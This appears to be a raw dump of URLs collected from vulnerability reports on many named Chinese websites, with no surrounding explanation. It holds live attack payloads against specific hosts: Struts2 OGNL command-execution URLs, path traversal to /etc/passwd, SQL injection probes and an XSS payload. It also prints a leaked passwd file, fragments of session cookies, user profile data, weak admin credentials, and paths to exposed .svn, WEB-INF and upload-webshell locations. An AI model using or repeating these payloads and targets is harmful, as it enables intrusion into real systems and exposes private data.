http://hters.htinns.com/HTERS/ScriptResource.axd?d=pIn6KUKoUCvN15ROF5KiVDwb87TWlbfzq78**********AAAAAAA0 http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 http://news.jiapin.com/tagjs.html?id=59&keyword=%E4%BD%B3%E5%93%81%E7%BD%91,%E5%85%AC%E5%91%8A%E6%8F%90%E7%A4%BA&contentid=3045 http://www.cttxj.com http://www.cttxj.com/yewu/yewu_news.asp?news_id=55 http://www.cttxj.com/service/service_news.asp?news_id=58 http://www.cttxj.com/about/news.asp?news_id=298 
http://www.cttxj.com/yewu/HangYe_news.asp?news_id=9 http://www.ctttj.com/ http://www.ctttj.com/studylog.asp http://www.ctttj.com/studylog.asp http://www.ctttj.com/tech/train_main.asp?class1_id=1 http://www.ctttj.com/tech/train_main.asp?class2_id=1 http://www.ctttj.com/tech/train_main.asp?class3_id=1 http://www.ctttj.com/tech/awareness_show.asp?awareness_id= http://www.ctttj.com/tech/question_show.asp?question_id= http://www.ctttj.com/jsyd_show.asp?news_id=233 http://www.ctttj.com:80/jsyd_show.asp?news_id=233 http://zq.cttgd.com/ http://zq.cttgd.com/zf.asp?id=34 http://zq.cttgd.com/newinfo.asp?id=28 http://zq.cttgd.com/hisite_files http://zq.cttgd.com/images http://www.as.cttln.com/ http://www.as.cttln.com/company/article_view.asp?id=994 http://www.chinatietong.com/ http://www.chinatietong.com/serv/comment.php3?id=39 http://www.chinatietong.com/wf/comment.php3?id=17534 http://www.chinatietong.com/tech/comment.php3?id=561 http://www.chinatietong.com/dang/comment.php3?id=176 http://www.chinatietong.com/news/comment1.php3?id=3234 http://www.chinatietong.com/serv/comment1.php3?id=71 http://www.chinatietong.com/serv/comment2.php3?id=22 http://www.chinatietong.com/wf/comment3.php3?id=7117 http://www.chinatietong.com/wf/comment1.php3?id=6616 http://www.chinatietong.com/news/index.php3.bak http://www.chinatietong.com/serv/index.php3.bak http://www.chinatietong.com/news/comment.php3.bak http://www.chinatietong.com/wf/comment.php3.bak http://cmpay.10086.cn/life/publicutilitie/payment/projectpay.htm?projectid=004&areaid=290 http://market.shouji.baofeng.com/market/bd_column.php?c=tab&type=game'&market=a03&platf=android&mtype=normal&ver=3.7.97&znum=11&grade=0&os=16 http://www.weimob.com/Webwall/bigWheel?id=42&bid=5&pid=1071 Url:http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?QueType= http://www.zoomla.cn/guest/Ask/MyAskList.aspx?QueType= http://127.0.0.1/thinksaas2/index.php?app=user&ac=resetpwd&mail=admin@admin.com&set=1d8c9f71eaa6923fc9d3cd5d10aea4ce 
http://cloud.189.cn/t/3qYvaunEnMZn发现无需密码可直接下载,转存。 http://ecstore.shopex.cn/ http://mall.brands.com.tw/ec http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd http://wh.cscec1b.net:8080/list.asp?id=44 http://203.91.45.54:8003/webapp/login/user-login!showLogin.action http://bq.sto.cn/Login.aspx xlink:href="data:image/svg+xml;base64 http://live.shopex.cn/ http://it.homeinns.com/ito_beta/main/Login.aspx https://180.153.139.91/woa/wdcctj/report.php http://shiyan.mop.com/ site:mop.com inurl:profile http://180.153.16.67/acms/login/index.action site:mop.com inurl:profile http://table.chinanews.com/vote2008/login.php http://table.chinanews.com/vote2008/view_results.php?sid=532 http://bbs.rom.baidu.com/ site:bbs.rom.baidu.com inurl:profile http://dzda.e21.cn/dzda/login.php site:goodbaby.com inurl:profile site:traffic.96900.com.cn traffic.96900.com.cn/home/column.aspx?aid=109‎ http://www.sd.chinanews.com/channel/channel.html?lmjc=xyxw&page=1 com:8080/dede/ com:8080/phpwebbackup.php com:8080/php.php http://211.160.72.136/console/ http://210.77.176.141/1.rar http://210.77.176.141/2.rar http://www.smics.com/jp/press/press_releases_details.php?id=176305 http://www.weimob.com/Webwall/getCon weimobdev:x:508:509::/home/weimobdev:/bin/bash sftpuser:x:507:508::/home/sftpuser:/sbin/nologin annchen:x:506:507::/home/annchen:/bin/bash andy:x:505:506::/home/andy:/bin/bash alfred:x:504:504::/home/alfred:/bin/bash keiman:x:503:503::/home/keiman:/bin/bash mysql:x:501:501::/home/mysql:/sbin/nologin www:x:500:500::/alidata/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin 
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin news:x:9:13:news:/etc/news mail:x:8:12:mail:/var/spool/mail:/sbin/nologin halt:x:7:0:halt:/sbin:/sbin/halt shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown sync:x:5:0:sync:/sbin:/bin/sync lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin bin:x:1:1:bin:/bin:/sbin/nologin root:x:0:0:root:/root:/bin/bash site:pinyin.sogou.com inurl:profile http://channel.3g.youku.com/ykmks/login.do http://itbbs.pconline.com.cn/51118052_6.html http://itbbs.pconline.com.cn/51118052_6.html http://locoy.com/member/licencemgr.php?uid=9997 http://locoy.com/member/licencemgr.php?uid=9998 http://www.locoy.com/member/licencemgr.php?action=viewcode&uid=9958 http://www.locoy.com/member/licencemgr.php?action=viewcode&uid=9957 http://demo.thinksns.com/ http://andy-game.googlecode.com/svn-history/ http://ad.huaweidevice.com/upload.php https://cardholder-ppcs.chinabank.com.cn https://cardholder-ppcs.chinabank.com.cn/jsp/.svn/entries http://61.156.8.196/sms_user/login.html山东长短信系统 http://www.ncosm.gov.cn/new/upload_soft.asp http://www.ncosm.gov.cn/new/upload.asp?action=upfile http://www.ncosm.gov.cn/new/edit/upload.asp http://www.ncosm.gov.cn/bb.asp http://love.ganji.com/showlive/sixroom/index/?bgurl=http://www.baidu.com/robots.txt http://www.phpnow.org/ http://www.phpnow.org/wooyun http://sh-ecrc.com/about.asp?id=8 http://bbs.game.91.com http://www.casnw.net/news/showgg.asp?id=1899&ksflno=0 http://www.caa.gov.cn/# http://xuelong.chinare.cn/upload/ http://i.meituan.com http://i.meituan.com/risk/downsms http://i.meituan.com/risk/resetpassword http://gifts.redbull.com.cn/search/?gt_type_id=-1&ex_size_select=-1>_name=8 clzx.jmpj.gov.cn/Admin/Admin_login.asp shell:clzx.jmpj.gov.cn http://www.gzdynasty.com/content.asp?id=21 http://www.gzdynasty.com/New_list.asp?id=156 http://www.gzdynasty.com/manage/login.asp http://www.msmchina.com/index.html 
http://www.wlj-china.com/2013/news/news.aspx?tagName=%e4%b8%ad%e5%9b%bd%e5%a5%bd%e5%a3%b0%e9%9f%b3 http://www.3dmgame.com/1.zip http://www.3dmgame.com/sys/init.php http://www.3dmgame.net/1.zip http://www.3dmgame.net/sys/init.php http://www.topnt.cn/ http://www.EXAMPLE.com/editor/fckeditor/filemanager/upload/php/upload.php http://www.EXAMPLE.com/images/stories/editorupload/下,使用原始文件名访问即可拿到Webshell。 http://www.baidu.com/s?wd=%E6%B8%85%E9%99%A4session http://www.notc.gov.cn/cn/WorkList.aspx?m=20121227134704560301 http://zncj.ncedu.gov.cn:8100/SelfCfg/ResetPassWord.aspx http://demo.zoomla.cn/User/UserZone/GatherStrainManage/HuaTeeRevert.aspx?ID=00000000-0000-0000-0000-000000000000'%20and%20@@version%3E0--&Gid=1&menu=delete&HuaTeePicID=00000000-0000-0000-0000-000000000000 http://www.jszg.edu.cn/portal/cert/query/certinfo?_idNo=00000000000000&_certNo=20103630142000001 http://www.jszg.edu.cn/portal/cert/query/certinfo?_idNo=00000000000000&_certNo=20103630142003001 http://www.jszg.edu.cn/portal/cert/query/img/ http://www.igocctv.com http://www.igocctv.com www.igocctv.com http://staticnova.ruoogle.com/nova/default/avator/m/defaultAvatar_m_8.jpg","exp":"30","gold":"1","constellation":"0","gender":"1","nick":"别跟我得瑟你不行","height":"176","birthday":"","blood_group":"0","lastlogin_at":"2014-02-07T13:25:11+0800","max_chatgroup":"1","closed_chatgroup":"0","city_name":"直辖市 http://staticnova.ruoogle.com/photo/1111049/201402012345052_784049_266x266.jpg","exp":"400","gold":"0","constellation":"2","gender":"2","nick":"倾尽年华终是梦。","height":"165","birthday":"1996 http://www.digisea.cn/digisea.rar http://www.digisea.cn/NSW.FCKeditor/editor/filemanager/connectors/test.html# http://www.zjrjks.org/ www.zjrjks.org/interIndex.do?method=printBMB http://bj.guosen.com.cn/index.php?s=/Html/Subscribe/ http://wen.duowan.com/WEB-INF/web.xml http://wen.duowan.com/q/index http://www.jxgzedu.gov.cn http://www.gxtr9.com/test/.svn/entries http://www.gxtr9.com/dzjy/test/.svn/entries 
http://www.gxtr9.com/dzjy/html/images/.svn/entries http://www.gxtr9.com/dzjy/html/scripts/.svn/entries http://www.gbicom.cn/passport/forgetpass inurl:goitem.asp?id= http://211.151.130.183/ http://msm.zhidao.baidu.com/recde?intsign=830744960868581851 url:http://db-iknow-mis00.db01.baidu.com:8080/audit/diquestion?period=current&dflag=21&zoneName=%C8%CB%B9%A4%C9%F3%BA%CB%CE%CA%CC%E2 cookie:BAIDUID=419CAB796047837917BF34A3EBEDEAEA:FG=1 http://skyxss.sinaapp.com http://websites.imqq.com/go/1883/aHR0cDovL3d3dy53b295dW4ub3JnLw== http://websites.imqq.com/go/1884/aHR0cDovL3d3dy45MHBhby5jb20= http://opac.library.hn.cn http://www.edugd.cn/web/ http://one.anjuke.com http://one.anjuke.com/Login.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[10000]%2c%23c.read%28%23d%29%2c%23k8team%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23k8team.println%28%23d%29%2c%23k8team.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29 http://ka.52pk.com:80/config.inc.php.bak http://tkkw.crtvu.cn/ http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=26&_studentcode=681 http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=26&_studentcode=154344 http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=59&_studentcode=3521783 http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=59&_studentcode=3847055 http://www.xanet.edu.cn http://www.xanet.edu.cn/detail.jsp?sort=5 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130624401048 
http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130626485753&forderid=000000000000008320130626485753 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130624405756 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=600104833000008320130619256383 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=600104833100008320130620282945 url:http://wap.ks.91.com/SimpleEbook/SubjectList.aspx?id=110 ftp://sctcm.gov.cn http://wooyun.org/bugs/wooyun-2014-049646 http://www.wocloud.cn/ http://www.wocloud.cn/portal/jsp/user/changePwd.jsp?code=pwd www.wocloud.cn http://www.wocloud.cn http://dflz.zhaoqing.gov.cn/website/dflz/dflzSiteAction.action http://itembank.open.com.cn/ http://www.fpa.gov.cn/FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.fpa.gov.cn/FCKeditor/editor/filemanager/connectors/test.html admin:admin:202.108.252.235 http://app.rainbowsoft.org/?zba=220 https://sso.hc360.com/ssologin?loginparam=&sourcetypeid=&logincode=&ReturnURL=http%3A%2F%2Fmy.b2b.hc360.com%2Fmy%2Fturbine%2Ftemplate%2Fcorcenter%2Cbusiness%2Csupplydetailedit.html& http://www.elecfans.com/topic/qqqun/admin admin:admin弱口令) http://wooyun.org/bugs/wooyun-2013-039159,的问题居然在内网又见面了,密码还没改。。 http://wm123.baidu.com/wm123.tar.gz http://home.sun0769.com/hd/houseTopicSurvey.action http://tour.sun0769.com/space/surveyView.action http://v.sun0769.com/channel/home.action http://jiaju.sun0769.com/home/product.action 
https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX%2BVEXYJDb5ICN8N5ebOfDqYAM9VLjrCb%2BL42et5s%3D&ddkey=http:AjaxLogonForm#https%3A%2F%2Fwww.hodo.cn%2Fmall%2FAjaxHistoryOrdersView%3FbreadCrumb%3DBrcmb%26currentSelection%3DOrderDetailSlct%26objectIdParam%3DorderId%26catalogId%3D10001%26langId%3D-7%26orderId%3D3720529%26storeId%3D10151%26orderStatusCode%3D%26identifier%3D1392122503362 https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX+VEXYJDb5ICN8N5ebOfDqYAM9VLjrCb+L42et5s=&ddkey=http:AjaxLogonForm#https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362 https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362 https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720528&storeId=10151&orderStatusCode=&identifier=1392122503361 http://www.wangjiu.com/ http://www.zjg.gov.cn/home/ http://www.zjg.gov.cn/home/WebVote/SubDefault.aspx?VoteGuid=ac192292-fac4-49b8-abf2-fd175f2f90f4 http://www.zjg.gov.cn/home/zwgkinfo/DepartMent/Default.aspx?DeptCode=001004 http://www.zjg.gov.cn/home/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=096&DeptCode=001004 http://www.camel.com.cn/member/orderdetail.aspx?orderId=368250)修改订单的id可查看任意订单,里面有收货相关敏感信息 mail.sei.pku.edu.cn/pipermail/act/2010-November/000225.html‎ http://mail.sei.pku.edu.cn/pipermail/act http://mail.sei.pku.edu.cn/ http://www.hneao.cn/gkkw/login.action?act=toMain http://www.cqpost.com/ask/search.aspx?type=%27&word= http://www.lfxcw.gov.cn/data/1.rar http://www.3need.com/admin.php# 
http://www.3need.com/liepin.php?do=five&id=13 http://hr.chinacdc.cn/ http://www.pubwin.com.cn/WEB-INF/classes/kodo.properties http://bbs.pubwin.com.cn/convert/index.php https://vip.lenovodata.com/images_per/logo.gif/1.php http://www.amap.com//agent/user/tmp/a8fa05d0a0a5814acea6717e79ddadd0.jpg/1.php http://www.hnsn.gov.cn/display.asp?id=12031 http://vip.club.sohu.com/szzmjc/public/upload_img/swfupload/swfupload.swf, http://baidu.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065 http://bbs.amap.com/misc.php?mod=ranklist inurl:vehweb/navigator index.php/storeHome/axisRight http://hotel.11185.cn/index.aspx http://hotel.11185.cn/admin/Login.aspx http://hotel.11185.cn/admin/ http://hotel.11185.cn/ckfinder/ http://hotel.11185.cn/images/ index.php/storeHome/axisRight http://www.super.cn/ http://112.124.56.216:8080/Super/EmptyClassroom/findEmptyClass.action http://english.nmefc.gov.cn/ http://english.nmefc.gov.cn/NewsLevel1Severlet.do?id=7 http://www.nmefc.gov.cn/nr/resultlogin.aspx?flag=result http://www.nmefc.gov.cn/special/login.aspx?special=1 http://neargoos.nmefc.gov.cn/login.php http://www.nmefc.gov.cn/haixiao/login.aspx http://news.qmango.com:8080/1.txt URL:http://www.linekong.com/pay/xk_core.php?city=%E6%B1%9F%E8%8B%8F http://duokoo.baidu.com/xs/?R=887&bck=12748&v=2&pageid=Ypz77o4s&simple=0&ssid=0&from=844b&bd_page_type=1&uid=3663087215BE9B812C8404F0442D89C1%3AFG%3D1&pu=sz%401320_2001%2Cta%40iphone_1_7.0_3_537&fr=xs_ios&netFlag=cmnet&dkfrc=6&usid=AB6FE7D5345504C4A1CCB1F2A481C4D1&word=%F0%9F%98%84xsstest%27onfocus=alert%281%29%20autofocus=%27 http://t.sohu.com/gy http://t.sohu.com/gy/twitter/help http://www.11185.com.cn/u/getAutoPayOnline.html http://www.ncosm.gov.cn/ http://www.ncosm.gov.cn/new/ViewInfo.asp?id=1441&sortname=%EF%BF%BD%EF%BF%BD%EF%BF%BD%C4%B6%EF%BF%BD%CC%AC&sortid=103 http://www.ncosm.gov.cn/new/ViewInfo.asp?classid=171&sortname=%D2%B5%CE%F1%C4%DC%C1%A6&id=907 http://www.ncosm.gov.cn/new/ViewInfo.asp?id=1442&sortname=%D0%C5%CF%A2%BC%EC%CB%F7 
http://网站地址/index_map.action?departId=xxxxxxxxx http://web1.psych.ac.cn/admin/MakeChanneltoHTML.php?channelID=22&language=CN http://web1.psych.ac.cn/admin/MakeTopictoHTML.php?channelID=22&topicID=92&language=CN http://enginpsych.psych.ac.cn/cn/news.php?type=1&sortid=221 http://enginpsych.psych.ac.cn/cn/piclist.php?type=4&sortid=188 http://enginpsych.psych.ac.cn/cn/info.php?type=2&sortid=222 http://enginpsych.psych.ac.cn/cn/shownews.php?type=1&id=392&sortid=221 http://enginpsych.psych.ac.cn/en/news.php?type=1&sortid=237 http://enginpsych.psych.ac.cn/cn/showpicnews.php?type=4&sortid1=&sortid=188&id=252 http://enginpsych.psych.ac.cn/en/info.php?type=2&sortid=240 http://enginpsych.psych.ac.cn/en/shownews.php?type=1&id=393&sortid=237 http://enginpsych.psych.ac.cn/en/piclist.php?type=4&sortid=244 http://enginpsych.psych.ac.cn/en/news.php?type=1&sortid=237 http://bdgene.psych.ac.cn/advancedPathwaySearch.do?pwsource=i-GSEA%20analysis http://www.bjucoss.com:8090/mscp/business/actionreport.action http://www.fjmf.gov.cn/ http://www.fjmf.gov.cn/Login.aspx?t=sjjs http://t.sohu.com/live/3572 http://t.sohu.com/live/insertw http://womag.iphone.unisk.cn/mobileserver/action/server.do google:inurl:Templates http://www.bkjy.sdnu.edu.cn/notice1.jsp?pk_notice=1806 http://office.homeinns.com/hcs/login.aspx http://www.ntjczxz.com/ http://www.ntjczxz.com/front/OceanPage.aspx?id=14&mid=2 http://www.ntjczxz.com/tflj/index.asp?sys=7 www.jxjsjy.com www.jxjsjy.com权限也很大。 http://506srm.cofco.com http://506srm.cofco.com/supermarket/Index_ItemView.aspx?ItemId= http://506srm.cofco.com/custom/Fortiens/Comm/MainPage/yzm.aspx?id= http://506srm.cofco.com/custom/supermarket/Index_ItemView.aspx?ItemId= http://506srm.cofco.com/custom/supermarket/CreateSuperMarketBill.aspx?ItemId= http://m.pcauto.com.cn/cmt/13103338_3760120_5.html http://www.gpai.net/index_index.action?searchKind=1&searchType=1¤tPage=1 www.xmtj.xcmcn.com)也一样 http://fj.11185.cn/ctable/czjfAction_addSzzffsRedirect.action 
http://english.352.cn/ http://test1.sxhs.cn/sl/sljxjy/log.asp http://test1.sxhs.cn/ http://www.8231.cn/list.php?category=0可以爆出数据库,可以得到数据库信息,还可以任意修改数据库,也可以得到www.92game.net的信息,还有其他网站 http://xlzx.psych.ac.cn/newslist.php?id=75 http://xlzx.psych.ac.cn/topnewslist.php?id=74 http://xlzx.psych.ac.cn/about.php?id=32 http://xlzx.psych.ac.cn/newsdetail.php?id=559&fu_id=3 http://xlzx.psych.ac.cn/xinsjlt/news_content.php?id=416&f_id=90 http://xlzx.psych.ac.cn/xinsjlt/articles.php?id=451 http://xlzx.psych.ac.cn/xinsjlt/cont_i.php?f_id=100&id=467 http://xlzx.psych.ac.cn/xinsjlt/newscontimg.php?f_id=94&id=435 http://xlzx.psych.ac.cn/xlwhyth/news_content.php?f_id=111&id=613 http://www.cbdf.cn/admin http://www.cbdf.cn/themes/cbdf/upload/files/download/webconfig.php.aaa http://www.chinafoodsltd.com/ http://www.chinafoodsltd.com:8080/IR/activity.jsp?ClassID=2014 http://www.chinafoodsltd.com:8080/IR_E/noticeDetail.jsp?ID=313 http://www.lncygt.gov.cn/content.php?cid=13&aid=2707 http://125.35.24.219/publish/default/ http://125.35.24.219/publish/default/ http://www.crfeb03.com/list.php?fid=1 http://www.crfeb03.com/search.php http://www.crfeb03.com/list.php?fid=1 http://m.mapabc.com/.svn/entries svn://172.17.40.61/minimap/html svn://172.17.40.61/minimap svn:special svn:externals svn:needs-lock ubuntu:/tmp$ www.nextsns.com http://rs.lenovo.com.cn/index.php http://315.stock.hexun.com/WEB-INF/web.xml http://315.stock.hexun.com/WEB-INF/classes/prm_ctx.xml http://app.hexun.com/WEB-INF/web.xml http://ceshi.hexun.com/WEB-INF/web.xml http://wap.hexun.com/WEB-INF/web.xml http://221.176.36.101/update/ http://www.yj-jg.com/ http://xlzx.psych.ac.cn/ http://www.chinesepsy.org/ http://hhimc.cha.org.cn/中国医院协会医院医疗保险管理专业委员会 http://www.eapacn.org/ http://www.nclexchina.com/ http://haicangjijin.org/ http://www.marco-bj.com/ http://www.tripure.com.cn/ inurl:login!forwardFrameIndex.action http://szxy.cxzj.net/ks/login/login!forwardFrameIndex.action 
http://e.lzszyjsxx.com/zy/login/login!forwardFrameIndex.action http://60.216.250.45/zc/login/login!forwardFrameIndex.action http://121.31.60.35/oa/login/login!forwardFrameIndex.action http://www.aqcz.gov.cn/management/index.php?c=main&a=forContent&table=zxly_hdjl&menuid=34&table_def=def_zxly_hdjl&limitNum=3却可以直接访问,还可以删除回复。 http://www.dajie.com/message/terminal?contractUid=11200561 http://it365.yesky.com/WEB-INF/web.xml http://it365.yesky.com/WEB-INF/classes/conf/datasource.xml http://manage.jxs.yesky.com/WEB-INF/web.xml http://admin.m.yesky.com/WEB-INF/web.xml http://autoproduct.yesky.com/WEB-INF/web.xml http://jgdw.chinasafety.gov.cn/ http://jgdw.chinasafety.gov.cn/smodel?model=04000000000000000633&search= http://www.xjcms.chinasafety.gov.cn/ http://www.xjcms.chinasafety.gov.cn/PfWebApp/RecOrSendFile/FileInfo.aspx?strInstanceId=BC3C6E12-923C-43F8-8F81-3A644EC148C3&WinItemFormatId=E19B7A9F-4673-4B87-8BA9-4E1671D3D7EE&FromType=0 http://www.oohdear.com/ http://www.oohdear.com:80/ www.oohdear.com http://117.135.147.82:8080 http://pay.linekong.com/ http://www.hengnan.gov.cn/sssweb/DirectoryPublic/main.aspx?DeptID=DA0011 font-family:font;"可以添加任意CSS属性。 http://kefu.linekong.com/eService/ http://www.fjspaq.com/default/verify.action http://www.fjspaq.com/default/verify.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://bjd.tcl.com/Newslist.aspx?code=0401 http://bjd.tcl.com/Newslist.aspx?code=0401‘,异常,并爆出网站绝对路径,如图 http://csm.bjd.tcl.com/ http://wooyun.org/bugs/wooyun-2010-048040 http://v.sogou.com/vc/topic.jsp?s_url=[内容可控 xxx.com/SubjectSearch.aspx?cn=64 
http://203.95.109.55:8788/secure/Logout!default.jspa http://203.95.109.55:8788/browse/BBSS-MT-17233p http://114.247.129.12/ulp/login.jsp### http://www.gylgb.gov.cn/show_news.asp?News_Class=123%20and%201=1&Nid=1440 http://www.gaoyou.gov.cn/gzcy/gzcy_bmxx_submit.php?depart_bianhao=15&depart_name=%B0%B2%BC%E0%BE%D6 http://statistic.terminal.lashou.com/show/login.php http://www.cloudsensing.cn:8082/admin.html http://www.boccfc.cn http://english.casm.ac.cn/index.php?col=7&file=31&PageNum=5 http://english.casm.ac.cn/old/ http://zhangheng.v2.taodiantong.cn http://zhangheng.v2.taodiantong.cn:80/ http://mp3.easou.com/ http://ulearning.gmcc.net/exam/index.php http://blog.douban.com/wp-admin/ Cache-Control:must-revalidate Connection:keep-alive Content-Type:text/plain Date:Thu Expires:Sun Keep-Alive:timeout=10 Location:http://www.douban.com/ P3P:CP="IDC Pragma:no-cache Server:nginx Set-Cookie:as="deleted Set-Cookie:ue="xxxxx@gmail.com Set-Cookie:dbcl2="2025898:RxSxqemxX5Qd4 X-Douban-Splittest:sns.is_recommended_user,movie.new-cinema-section,movie.has_video http://cms.qingdao.gov.cn:10000/cmsweb/admin/loadUserAttrAction.do?dn=dc=cms,cn=human,sn=1 http://cms.qingdao.gov.cn:10000/cmsweb/admin/resetUserPasswordAction.do?dn=dc=cms,cn=human,sn=1 http://cms.qingdao.gov.cn:10000/cmsweb http://cms.qingdao.gov.cn:10000/n16858051/n16858711/n28030640.files/n28030645.jsp http://124.207.244.222/ google:m/search/list.php?siteId= http://www.jxjsjy.com/login.html登录后,会弹出一个完善个人信息(身份证、邮箱、手机)的窗口 http://www.smb-store.com/fckeditor/editor/filemanager/browser/default/browser.html?Connector=../../connectors/aspx/connector.aspx http://postmail.com.cn/ http://www0.super8.com.cn/mobileInterface/Super8Interface.asmx?op=getCustInfo存在sql注入 Super8Interface.asmx/getCustInfo www0.super8.com.cn http://www0.super8.com.cn http://211.152.123.124/ http://www.cnpostair.com/ http://www.cnpostair.com/yw.asp?xwClass=%D2%B5%EF%BF%BD%EF%BF%BD%CE%A7 http://www.cnpostair.com/show_news1.asp 
http://elqlf.haimen.gov.cn/hmqlyg/link_iframeUrl.do?url=/hmqlyg/wjdc_toWjdc.do?id=9657C99F8C3247EE9A6386C6E6F8F7EF@mc=s_hms http://58.221.238.243:8808/dflzjszxcp/employee_toLogin.do http://58.221.147.11/jslyqtrd/manage/ns_toshouye.do?webid=rd http://www.ntcredit.com/cms/manage/ns_toshouye.do http://oa.jiaji.com/oa http://219.134.187.48/manager/html http://219.134.187.48/tomcat/ http://decoclub.ellechina.com/calendar_cont.php?calid=12 http://decoclub.ellechina.com/detailopus.php?leftlogin=islogin&uid=34 http://decoclub.ellechina.com/detailopus_cont.php?id=66&uid=34 http://decoclub.ellechina.com/detailopus_msg.php?uid=34 http://decoclub.ellechina.com/detailopus_pic.php?uid=34 http://decoclub.ellechina.com/masterlarge.php?id=7 http://decoclub.ellechina.com/msg_act.php?uid=34 http://decoclub.ellechina.com/opuslist_cont.php?id=33/2 www.hikvision.com www.ys7.com www.shipin7.com http://www.hikvision.su/ http://www.hikvision.su/search.php?search_term=-1 http://www.hikvision.su/search.php?search_term=-1 http://www.hikvision.su/search.php?search_term=-1 http://www.hikvision.su/search.php?search_term=-1 http://www.hikvision.su/search.php?search_term=-1 http://app.nn365.org.cn/?app=vote&controller=vote&action=total&contentid=1 http://www.kaixin001.com/records/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg-30.html http://211.136.111.144:8080/NCMBH/user/login?, http://211.136.111.144:8080/NCMBH/user/info http://www.teamhd.net(上海腾翼多媒体)是一家专注广告机的公司,继http://wooyun.org/bugs/wooyun-2014-041143上次旗下IPUB联网数字标牌管理系统4.x系列都存在struts2漏洞修复之后,再次发现,系统存在Debug调试模式代码执行漏洞。 www.leiansoft.com http://www.leiansoft.com/admin/ http://www.leiansoft.com/admin/edit/admin/login.asp http://mail.leiansoft.com/ http://125.98.76.40/login.aspx?ReturnUrl=%2fDefault.aspx http://www.huxiu.com/member/edit_profile.html?is_ajax=1 www.nandu.com登陆时跳到了http://user.nandu.com/passport/index.php,于是注册登陆。 http://sns.nandu.com/home.php?mod=spacecp&ac=avatar 
http://user.oeeee.com/nduser/data/tmp/uploadxxx.jpg/1.php http://www.cpac.com.cn/ http://www.cpac.com.cn/manage/admin/admin_index.aspx http://124.207.29.201/ http://124.207.29.201/CheckUserName.asp?username= http://124.207.29.201/zygg_fb/ggzx/chaxun_guandian.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_yzxgyw.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_xgzs.asp http://124.207.29.201/zygg_fb/wzcp/wzcp_chaxun.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_sbf.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_yzf.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_fagui.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_zzf.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_query_res.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_zlf.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_hangye.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_zhishi.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_diaoyan.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_shiye.asp 